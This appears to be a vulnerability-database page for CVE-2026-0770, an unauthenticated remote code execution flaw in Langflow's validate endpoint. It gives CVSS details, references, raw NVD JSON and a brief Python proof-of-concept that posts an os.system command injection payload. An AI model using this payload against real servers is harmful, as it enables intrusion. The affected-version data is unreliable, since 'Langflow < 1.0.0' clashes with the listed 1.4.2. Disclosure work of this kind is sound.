CVE-2026-0770

Description

Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:1.4.2:-:*:*:*:*:*:* - VULNERABLE

Langflow < 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = 'http://target.com/validate'
payload = {'exec_globals': '__import__("os").system("whoami")'}
response = requests.post(target, json=payload)
print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0770
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0770
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0770/
[4] VulDB https://vuldb.com/cve/CVE-2026-0770
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-036/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0770", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:04.063", "lastModified": "2026-02-18T16:43:44.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325."}, {"lang": "es", "value": "Langflow exec_globals Inclusión de Funcionalidad desde Esfera de Control No Confiable Vulnerabilidad de Ejecución Remota de Código. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Langflow. La autenticación no es requerida para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro del manejo del parámetro exec_globals proporcionado al endpoint validate. El problema resulta de la inclusión de un recurso desde una esfera de control no confiable. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de root. Fue ZDI-CAN-27325."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:1.4.2:-:*:*:*:*:*:*", "matchCriteriaId": "81AAA7F9-843A-456C-89A1-B99D18AD4328"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}